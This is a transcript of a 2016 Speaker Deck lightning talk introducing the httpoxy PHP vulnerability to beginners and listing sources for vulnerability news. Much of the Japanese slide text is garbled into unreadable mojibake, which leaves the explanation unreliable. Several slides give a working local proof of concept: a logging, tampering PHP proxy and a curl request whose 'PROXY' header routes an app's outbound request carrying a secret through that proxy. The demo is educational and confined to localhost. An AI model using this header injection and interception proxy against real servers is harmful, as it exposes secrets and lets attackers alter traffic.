Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5
Search
uzulla
July 20, 2016
Technology
10
6k
初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5
PHPBLT #5でほぼしゃべらなかったLTの資料です。
uzulla
July 20, 2016
Tweet
Share
More Decks by uzulla
See All by uzulla
似たもの同士のPerlとPHP
uzulla
1
180
More Context, Better Code. 既存コードやOAS等をコンテキストとしてLLMに与える事で、よりよいコード生成を行う話
uzulla
1
130
あなたのアプリ、ログはでてますか?あるいはログをだしてますか? (Funabashi.dev用 軽量版)
uzulla
3
210
セッションのトークセッション / Traps for PHP session features in growing web apps
uzulla
2
150
Crafting a Own PHP - ウキウキ手作りミニマリストPHP
uzulla
5
2.2k
例外を投げるのをやめてみないか? あるいは受け入れてみないか? - How to use exceptions other than throwing
uzulla
4
1k
PHPerが ISUCONでやるべき事
uzulla
1
1.1k
開発生産性は上がらない - N Ways to Reduce Development Productivity
uzulla
1
270
test is not a job
uzulla
1
520
Other Decks in Technology
See All in Technology
偏光画像処理ライブラリを作った話
elerac
1
170
IAMポリシーのAllow/Denyについて、改めて理解する
smt7174
2
210
生成AI×財務経理:PoCで挑むSlack AI Bot開発と現場巻き込みのリアル
pohdccoe
1
720
日経のデータベース事業とElasticsearch
hinatades
PRO
0
230
4th place solution Eedi - Mining Misconceptions in Mathematics
rist
0
140
あなたが人生で成功するための5つの普遍的法則 #jawsug #jawsdays2025 / 20250301 HEROZ
yoshidashingo
2
290
わたしがEMとして入社した「最初の100日」の過ごし方 / EMConfJp2025
daiksy
14
5k
EMConf JP 2025 懇親会LT / EMConf JP 2025 social gathering
sugamasao
2
190
短縮URLをお手軽に導入しよう
nakasho
0
150
PHPで印刷所に入稿できる名札データを作る / Generating Print-Ready Name Tag Data with PHP
tomzoh
0
180
Pwned Labsのすゝめ
ken5scal
2
440
システム・ML活用を広げるdbtのデータモデリング / Expanding System & ML Use with dbt Modeling
i125
1
320
Featured
See All Featured
The Invisible Side of Design
smashingmag
299
50k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
9.3k
Optimizing for Happiness
mojombo
376
70k
Art, The Web, and Tiny UX
lynnandtonic
298
20k
Code Reviewing Like a Champion
maltzj
521
39k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
10
510
Speed Design
sergeychernyshev
27
810
Designing for Performance
lara
604
68k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
46
2.3k
Why You Should Never Use an ORM
jnunemaker
PRO
55
9.2k
BBQ
matthewcrist
87
9.5k
Making Projects Easy
brettharned
116
6k
Transcript
PHPBLT#5 Httpoxyͱ͔ͷ 20160720 uzulla
ࣗݾհ • Junichi Ishida aka uzulla • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢ • HachiojiͳΜͨΒͱ͔
• ͳΜͨΒHacjioji in ͱ͔
Httpoxy • https:/ /httpoxy.org/ • ࡉͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦ͷϦΫΤε τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ • ΞϓϦ͔Βଞͷαʔόʔͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ •
͋Δ͍ɺվ͟ΜͰ͖ΔՄೳੑ • ΈΜͳௐࠪࡁΈͩΑͶʂʁ • ʢΈΜͳ͍ͬͯͨΒϖʔδඈ͢ʣ
None
• ʮCLIͰΑ͋͘Δ༷ʯͱʮCGIͷ༷ʯͷিಥ͕ݪҼ • HTTP_PROXYڥมͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ ͕Α͋͘Δ • ΣϒΞϓϦʹʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣPHPͰ CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ • ͯ͞ɺCGIͷ༷Ͱʢྫ͑ʣHOGEͱ͍͏ϦΫΤετϔομ
ʔΛHTTP_HOGEڥมʹอଘ͢Δͷ͕ͩ…ɻ • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏ڥม͕ ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ
• CGIϦεϖΫτͳPHPmod_phpfastcgi͜ͷ༷ • ͳ͓ɺPHPࣗମ͜ͷ੬ऑੑӨڹ͠ͳ͍ • օେ͖file_get_contentsӨڹͳ͍ • ͕Μͬͯ࡞Γ͜·ͳ͚ΕӨڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ • HTTP_PROXYΛड͚ೖΕΔදతͳϥΠϒϥϦͱͯ͠guzzle
• 6.2.1Ͱमਖ਼ • guzzle࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠ΘΕ͍ͯ ΔɺͳͷͰʹͳͬͨͷͰͨ͠ʂ
ͳ͓… • ઃఆͰ͖ΔͷHTTP_PROXYڥมͰ͋ͬͯɺHTTPS_PROXY ڥมࢦఆͰ͖ͳ͍ • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ • ͭ·ΓɺͬऔΕΔͷHTTP • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ
• େͷϠόΠใHTTPSͩΖ͏…ଟ…ɻ
ΦνͱͳΔରࡦ • !ΣϒαʔόͰɺPHPͷࣄલʹϔομʔΛམͱ͢ • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢ • ίʔυΛ͢ • ϥΠϒϥϦͷόʔδϣϯΞοϓ •
❌ʮίʔυઌ಄ͱ͔Ͱڥม্ॻ͖͢Ε͍͍ͷͰʁʯ ʮ೦ͳΒແཧͳͷͰ͢ʯ
͜͜·Ͱօ͞Μ͝ଘ͡ • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ • ʮࣗͰʯௐࠪରԠͯ͠·͔͢ʁ • ʮࣗͰʯීஈ͔Βใऩूͯ͠·͔͢ʁ •
ʢͳ͓ϑϦʔλʔݽಠͳͷͰવηϧϑαʔϏε…ʣ
ࢼͯ͠·͔͢ʁ • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ • ੬ऑੑࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ • ௨ৗࣗͰ࣮͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ ଟ͍ • Proof
of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ • ʢ࠷ۙࢮޠɿexploit codeʣ
ࢼͦ͏ʂ • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ
• PoCͲ͜ʹ͋Δ͔ʁ • CVEʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱͳ͍ɺͷͰ୳͢ • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ͍ΔͷͰ… • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢExploitʣઈରʹ࣮ߦ͢Δͳʂʂʂ • CVEͱ͔ʹͬͯΔౕେৎͩΖ͏͕ɺྑͷExploitഁ
յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ • ࠓճhttpoxy͕ެ։͍ͯͨ͠ • https:/ /github.com/httpoxy/php-fpm-httpoxy-poc
// ݩͷίʔυ͜ͷΑ͏ͳײ͡ // "guzzlehttp/guzzle": "~6.0" $client = new GuzzleHttp\Client(); $client->request(
'POST', 'http://my-internal-microservice.example.com/', ['secret' => 'some-really-secret-string'] ); echo "Request sent\n";
// ͦͷ··Ͱ͑ͳ͍ͷͰɺίʔυमਖ਼ // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ require 'vendor/autoload.php'; $client =
new GuzzleHttp\Client(); $res = $client->request( 'POST', 'http://127.0.0.1:8002/api.php?himi=tsu', ['form_params' => ['secret' => 'I_AM_PHPER']] ); echo $res->getBody();
API(?!)Λ࡞ <?php // api.php echo "BLT!BLT!";
ΞϓϦͱAPI(?!)Λىಈ $ composer install $ php -S 127.0.0.1:8001 index.php #
ผγΣϧͰ $ php -S 127.0.0.1:8002 api.php
ͨΊͯ͠ΈΔ $ curl 'http://localhost:8001/' BLT!BLT! • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK
ѱҙ͋ΔProxyΛ༻ҙ͢Δ • ͝ՈఉʹProxy͕͋Δํෆཁ • Charlesͱ͔ • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙͳʹ͕ϋϠϦͳͷʁ)
ѱҙ()͋ΔࡶͳproxyΛॻ͘ <?php $uri = $_SERVER['REQUEST_URI']; $body = file_get_contents('php://input'); $method =
$_SERVER['REQUEST_METHOD']; error_log($body); error_log(print_r($_SERVER,1)); require 'vendor/autoload.php'; $client = new GuzzleHttp\Client(); $res = $client->request($method, $uri, ['body' => $body]); echo $res->getBody();
ࡶͳProxyʹ͍ͭͯ • ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ • దʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ ʢproxy͔ͩΒͶ…ʣ • ͜ͷίʔυࡶͰةݥͳͷͰ࣮ݧҎ֎ʹઈରʹ͏ͳΑʂ • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ
ࡶͳproxy্ཱͪ͛ $ php -S 127.0.0.1:8003 proxy.php
࣮ࡍʹ੬ऑੑΛςετͩʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!
• ʮ೦͜ΕͰ͏͖͝·ͤΜʯ • ͳΜͱbuiltin server ੬ऑੑ͕ͳ͍ʂ͆ • ͱ͍͏͜ͱͰɺ࡞apachehereΛ͔ͭ͏(ͳΜͰ͍͍͚Ͳ) • https:/
/github.com/uzulla/apachehere $ apachehere -p 8001 DocumentRoot : /xxx php-cgi open : http://127.0.0.1:8001/ <snip> [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php
ϦτϥΠʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!
ޭ͢Δͱproxyͷϩάʹ… [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20
02:01:43 2016] Array ( [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc [REMOTE_ADDR] => 127.0.0.1 [REMOTE_PORT] => 53696 [SERVER_SOFTWARE] => PHP 7.0.3 Development Server [SERVER_PROTOCOL] => HTTP/1.1 [SERVER_NAME] => 127.0.0.1 [SERVER_PORT] => 8003 [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu [REQUEST_METHOD] => POST [SCRIPT_NAME] => /api.php [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php [PHP_SELF] => /api.php [QUERY_STRING] => himi=tsu [HTTP_HOST] => 127.0.0.1:8002 [HTTP_PROXY_CONNECTION] => Keep-Alive [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3 [CONTENT_TYPE] => application/x-www-form-urlencoded [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded [CONTENT_LENGTH] => 17 [HTTP_CONTENT_LENGTH] => 17 [REQUEST_TIME_FLOAT] => 1468947703.6871 [REQUEST_TIME] => 1468947703 )
[Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20 02:01:43
2016] Array ( snip [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ
proxyΛमਖ਼͢Ε… // proxy.php //echo $res->getBody(); echo "ീԦࢠʂീԦࢠʂ"; • ͱमਖ਼ͯ͠ $
curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' ീԦࢠʂീԦࢠʂ • վ͟ΜޭͰ͢Ͷʂ
ͱ͍͏͜ͱͰɺ • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷॏཁɺษڧʹͳΔ • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ
͋ͱɺ৻ॏʹͶʂ • ύονόʔδϣϯΛ͘Έ͍͚ͯͳ͍ • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮ʯ exception: php_sapi_name() has been disabled
for security reasons. It can be re-enabled by adding it to the google_app_engine.enable_functions ini variable in your applications php.ini • ʮGAE ͕ѱ͍ ͷ༷Ͱʁʯʮ͔ͨ͠ʹʯ
ͰυίͰΔ͔ʁ • օ͞ΜͲ͜Ͱͬͯ·͔͢ʁ
ΛΥον͠ଓ͚Δ • ໘͕ͩࣄͩʂ • TwitterͳͲSNSͰΔ • CVEͳͲΛߪಡ͢Δ • χϡʔεαΠτΛߪಡ͢Δ •
ެࣜϦϦʔεΛߪಡ͢Δ
TwitterͳͲSNS • ใੑ͕ߴ͍ɺ5ׂ͘Β͍͜͜ͰଘࡏΛΔࣄʹͳΔ • ʢPHPͷਓͰͳ͆͘ʣJSɺGoɺPerlΠϯϑϥํ໘ͳͲͷਓΛ ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ • ৄ͍͠ਓવʹ͢Δ͜ͱ͕ଟ͍͠ɺ ʢΘ͔͍ͬͯΔͷͰʣҰ࣍ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍
ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ • http:/ /jvn.jp/report/ • JVNɺຊޠɺ·͚ͣͩ͜͜Ͱྑ͍ʢͱࢥ͏ʣ • Feed͋ΔΑ • https:/
/www.jpcert.or.jp/ • JPCERTɺϝϧϚΨ͋ΔΑʂ
• https:/ /nvd.nist.gov/download.cfm • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར • CVE΄΅Ұ࣍ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ • https:/ /security.sensiolabs.org/database
• PHPϥΠϒϥϦͷใɺFeed͕͋ΔͷͰศར
ҰൠతͳχϡʔεαΠτ • ҰൠతͳITܥχϡʔεαΠτ…ຊจಡ·ͣʹ͙͢ʹϦϯΫઌ ͷҰ࣍ใݴͬͨํ͕ྑ͍…ɻ
• reddit֤छɺใੑߴ͍͕ίϝϯτ͙͢ʹ৴༻͠ͳ͍Α͏ʹ • https:/ /www.reddit.com/r/netsec • https:/ /www.reddit.com/r/sysadmin • https:/
/www.reddit.com/r/PHP • hackernewsɺ͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘ • https:/ /news.ycombinator.com/news
ެࣜαΠτ • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ • ͕͔͍ࣗͭͬͯΔϑϨʔϜϫʔΫϥΠϒϥϦPHPͷϦϦ ʔεͱ͔Έͯྑ͍ͷͰʁʁ
blog • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔ • ηΩϡϦςΟاۀͷϒϩάΑ͍ • વ͚ͩͲɺཏੑ͕ͳ͍ • ʮ୯ޠʯΛͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰΑ͍ •
झຯ͕ͰΔͷͰলུ
Branded Vulnerability ͳαΠτ • ࠷ۙΩϟονʔͳ໊લ͕͘ɺHttpoxyͦ͏ • GHOST,FREAK,POODLEʑ • ·ͱΊαΠτΈ͍ͨͳͷɺγΣΞ͘͢͠ΩϟονʔͳΞΠ ίϯ͕͋ͬͨΓͯ͠Α͍
• ଟ͘ͷ߹CVEΑΓΘ͔Γ͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ ͰOK͕ͩɺӳޠͰ͢ɻ • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱͳ͍ɺٯ·͔ͨ͠Γ
ใΩϟον·ͱΊ • ΥονʹRSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱͳ͍͆ʣ • JPCERTͱJVN͘Β͍ొͯ͠Α͍ͷͰ • Branded VulnerabilityͳαΠτ͕͋Ε·ͣνΣοΫ •
ӳޠ͕ॏཁʢʣ • ༁ղઆهࣄҰ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚ Ε߄ͯͣʹਖ਼࠲ͯͭ͜͠ͱ
That's all folks! • ੬ऑੑࣗͰͨΊͦ͏ʂ • χϡʔεΛͪΌΜͱݟΑ͏ʂ • ͪΌΜͱ੬ऑੑΛѲͯ͜͠ʂ •
Httpoxyɺ͋Μ·Γखͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ // enjoy ! $ grep -r HTTP_PROXY /your/codes/